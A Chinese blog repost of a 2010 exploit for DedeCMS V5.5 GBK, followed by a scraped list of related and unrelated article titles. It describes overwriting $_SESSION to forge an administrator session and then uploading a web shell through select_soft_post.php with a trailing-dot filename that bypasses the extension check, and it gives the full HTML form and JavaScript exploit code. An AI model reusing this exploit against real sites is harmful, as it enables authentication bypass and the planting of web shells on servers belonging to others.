在session.auto_start开启的情况下可以任意覆盖$_SESSION变量，我们可以伪造管理员登录并上传文件

/DedeCmsV55-GBK-Final/uploads/include/dialog/select_soft_post.php

上传时重命名为    *.php.
即可绕过检查上传shell

exp:

<form action="" method='POST' enctype="multipart/form-data">
    U R L:<input type="text" name="target" size="50" value="http://192.168.1.110">  
    Path:<input type="text" name="path" value="/DedeCmsV55-GBK-Final/uploads/include/dialog/select_soft_post.php" size="90"><br>
File: <input type='file' name='uploadfile' size='25' />(Filetype must be GIF/JPEG etc)       
            RenameTo:<input type='test' name='newname' value="shell.asp."/><br>
             
        <input type=hidden name="_SESSION[dede_admin_id]" value=1>
                <input type=hidden name="bkurl" value=1>
            <input type='button' value='submit' οnclick="fsubmit()"/><br><br><br><br><br><br>
        dedecms 0day exp..<br>
        need: session.auto_start = 1<br>
        By toby57        2010/2/22
    </form>
<script>
function fsubmit(){
        var form = document.forms[0];
        form.action = form.target.value + form.path.value;
        tmpstr = form.target.value +'/'+ form.newname.value;
        form.bkurl.value = tmpstr.substr(0,tmpstr.length-1);
        form.submit();
        }
</script>

转载于:https://blog.51cto.com/jiedushi/281734

DEDECMS v5.5 GBK Final 的一个鸡肋漏洞相关推荐

1. php中%3c w() %3e,DedeCMS V5.7 SP2后台存在代码执行漏洞

   原标题:DedeCMS V5.7 SP2后台存在代码执行漏洞 *本文原创作者:风炫520,本文属FreeBuf原创奖励计划,未经许可禁止转载 简介 织梦内容管理系统(DedeCms)是一款PHP开源网 ...

2. php平台下的dedecms,网上最流行的php网站管理系统 DedeCMS V5.5 gbk 正式版正式发布(Build-0309)...

   DedeCMS V5.5增强或修正功能列表 一.已经修正的BUG: 1.添加后台系统管理员账号,无法删除会员列表的账号: 2.这篇文档需要注册会员才能访问,你目前是:注册会员(提示文字不正确): 3. ...

3. DedeCMS V5.7 前台任意用户密码修改漏洞

   本博客已搬迁至:https://n0puple.github.io/ 此处不再更新文章 本文仅用于技术讨论与研究,文中的实现方法切勿应用在任何违法场景.如因涉嫌违法造成的一切不良影响,本文作者概不负责 ...

4. 织梦支持html5吗,自动更新HTML FOR DedeCMS V5.3(支持首页，列表页，文章页)

   关键字描述:支持 首页 文章 更新 自动 DedeCMS 模块 安装 DedeCMS V5.3的使用方法很简单~~~ 直接用后台的模块安装就可以了.坚决贯彻实施官方的插件模块化,一键安装的理念. 当然 ...

5. 织梦cms5.7搭配php哪个版本,DedeCMS V5.5正式版正式发布(Build-0912)

   文件类型:.zip 软件大小:4.2MB 下载次数: 软件类别:国产软件 软件语言:简体中文 授权方式:共享软件 运行环境:PHP4.x.5.x + MySQL4.x.5.x 更新时间:2009-09 ...

6. DeDeCMS v5.7 SP2 前台任意用户密码修改漏洞复现

   DeDeCMS v5.7 SP2 前台任意用户密码修改漏洞复现 一.漏洞概述 1.简介 织梦内容管理系统(DedeCms) [1] 以简单.实用.开源而闻名,是国内最知名的 PHP 开源网站管理系统, ...

7. DeDeCMS v5.7 SP2 正式版 前台任意用户密码修改漏洞复现

   文章目录 简介 漏洞限制 影响版本 复现环境 工具准备 一.搭建网站 二.打开服务器代理 三.复现过程 注意 简介 织梦内容管理系统(DedeCms) [1] 以简单.实用.开源而闻名,是国内 最知名 ...

8. xamarin其实也是一个鸡肋

   刚刚体验了一把VS 2015,后来因为部分sdk和工具下载太慢,还是最终决定卸载.顺道了解了下xamarin studio.个人感觉Xamarin完全也是一个鸡肋,没必要过多的时间在xamarin上面 ...

9. dedecms v5.7 sp2代码执行漏洞复现

   环境搭建 DeDeCMS官网:http://www.dedecms.com 网站源码版本:DedeCMS V5.7 SP2正式版 程序源码下载:http://www.dedecms.com/produ ...

最新文章

1. Python之装饰器
2. pcm 转化为wav 文件
3. mysql timestamp 差值_MySQL中TIMESTAMPDIFF和TIMESTAMPADD函数的用法(两个日期之间的差值)...
4. java-第七章-数组-循环输出
5. CF-196 D.The Next Good String(hash)
6. 水晶报表-横向设计页面，设置网格高度
7. java.util.concurrent.ExecutorService 接口 源码
8. [目录]搭建一个简单的WebGIS应用程序
9. Case 2-1：用空间平滑法分析华南地区的TAI语地名分布
10. 弹出菜单快捷键的使用方法
11. 第二层交换机工作原理
12. Spring Aware接口注入
13. 【Espruino】NO.18 使用L298N驱动直流电机
14. edius裁剪快捷键_EDIUS 快捷键大全 edius常用快捷键大全
15. javascript定时器的计时事件
16. vue微信内h5页面微信授权登录
17. 自己动手写iPhone wap浏览器之界面架构篇
18. 电商运营中京东运营法则
19. 公司邮箱后缀有哪些？外贸邮箱域名有哪些你知道吗？
20. 地统计分析在气象领域的应用

热门文章

1. Lambda 表达式有何用处？如何使用？
2. Docker持续部署图文详解
3. Windows Phone 7 Tips (4)
4. Ubuntu开启远程连接
5. 传统企业应用转型--从0到1的微服务之路
6. linux下shell显示-bash-4.1#不显示路径解决方法
7. slf4j 和 log4j合用的（Maven)配置
8. [MSSQL2012]LEAD函数
9. 如何安装或卸载 Internet Explorer 9？
10. 数据库防护技术对比分析